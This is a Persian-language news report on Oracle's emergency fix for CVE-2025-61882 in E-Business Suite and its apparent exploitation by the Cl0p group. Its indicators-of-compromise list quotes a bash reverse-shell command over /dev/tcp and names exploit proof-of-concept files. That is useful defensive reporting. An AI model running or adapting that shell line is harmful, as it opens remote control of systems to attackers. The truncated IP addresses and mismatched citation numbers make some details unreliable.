اوراکل یک بهروزرسانی اضطراری برای رفع یک نقص امنیتی حیاتی در مجموعه E-Business خود منتشر کرده است که گفته میشود در موج اخیر حملات سرقت دادههای Cl0p مورد بهرهبرداری قرار گرفته است.
این آسیبپذیری که با شناسه CVE-2025-61882 (امتیاز ۹٫۸ در CVSS) ردیابی میشود[۱]، مربوط به یک اشکال نامشخص است که میتواند به یک مهاجم غیرمجاز با دسترسی به شبکه از طریق HTTP اجازه دهد تا مؤلفه پردازش همزمان اوراکل را به خطر بیندازد و کنترل آن را به دست گیرد.
اوراکل در یک توصیهنامه گفت[۲]: “این آسیبپذیری از راه دور و بدون احراز هویت قابل بهرهبرداری است، یعنی ممکن است بدون نیاز به نام کاربری و رمز عبور از طریق شبکه مورد بهرهبرداری قرار گیرد. در صورت بهرهبرداری موفقیتآمیز، این آسیبپذیری ممکن است منجر به اجرای کد از راه دور شود.”
راب دوهارت، مدیر ارشد امنیت اوراکل، در یک هشدار جداگانه گفت[۳] که این شرکت اصلاحاتی را برای CVE-2025-61882 منتشر کرده است تا “بهروزرسانیهایی را در برابر بهرهبرداری احتمالی دیگری که در طول تحقیقات ما کشف شده است، ارائه دهد.”
به عنوان شاخصهای نفوذ (IoC)، این فناوری آدرسهای IP و مصنوعات زیر را به اشتراک گذاشت که نشاندهندهی دخالت احتمالی گروه Scattered LAPSUS$ Hunters در این بهرهبرداری است[۴]:
- ۱۰۷٫۲۰۷[.]۲۶ (فعالیت بالقوهی GET و POST)
- ۱۸۱٫۶۰[.]۱۱ (فعالیت بالقوهی GET و POST)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 (ایجاد یک اتصال TCP خروجی از طریق یک اتصال خاص) پورت)
- zip[5]
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py[6]
- oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py[7]
خبر مربوط به آسیبپذیری روز صفر اوراکل چند روز پس از انتشار گزارشهایی مبنی بر یک کمپین جدید که احتمالاً توسط گروه باجافزار Cl0p با هدف قرار دادن Oracle E-Business Suite انجام شده است، منتشر شد[۸]. Mandiant، شرکت متعلق به گوگل، این فعالیت مداوم را به عنوان یک “کمپین ایمیل با حجم بالا” توصیف کرد که از صدها حساب کاربری آسیبدیده آغاز شده است.
چارلز کارماکال، مدیر ارشد فناوری Mandiant در Google Cloud، در پستی[۹] که در لینکدین به اشتراک گذاشته شد، گفت: «Cl0p از چندین آسیبپذیری در Oracle EBS بهرهبرداری کرد که آنها را قادر ساخت تا در آگوست ۲۰۲۵ مقادیر زیادی از دادهها را از چندین قربانی سرقت کنند.» وی افزود: «از چندین آسیبپذیری، از جمله آسیبپذیریهایی که در بهروزرسانی جولای ۲۰۲۵ اوراکل وصله شده بودند و همچنین آسیبپذیری که این آخر هفته وصله شد (CVE-2025-61882)، بهرهبرداری شد.»
کارماکال خاطرنشان کرد: «با توجه به بهرهبرداری گسترده از آسیبپذیریهای روز صفر که قبلاً رخ داده است (و بهرهبرداری روز n که احتمالاً توسط سایر بازیگران ادامه خواهد یافت)، صرف نظر از زمان اعمال وصله، سازمانها باید بررسی کنند که آیا قبلاً به خطر افتادهاند یا خیر.»
منابع
[۱] https://nvd.nist.gov/vuln/detail/CVE-2025-61882
[۲] https://www.oracle.com/security-alerts/alert-cve-2025-61882.html
[۳] https://blogs.oracle.com/security/post/apply-july-2025-cpu
[۴] https://thehackernews.com/2025/09/scattered-spider-resurfaces-with.html
[۵] https://www.virustotal.com/gui/file/76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
[۶] https://www.virustotal.com/gui/file/aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121
[۷] https://www.virustotal.com/gui/file/6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b
[۸] https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/beware-of-mcp-hardcoded-credentials-a-perfect-target-for-threat-actors
[۹] https://thehackernews.com/2025/10/google-mandiant-probes-new-oracle.html
[۱۰] https://www.linkedin.com/feed/update/urn:li:activity:7380595612443893760
ثبت ديدگاه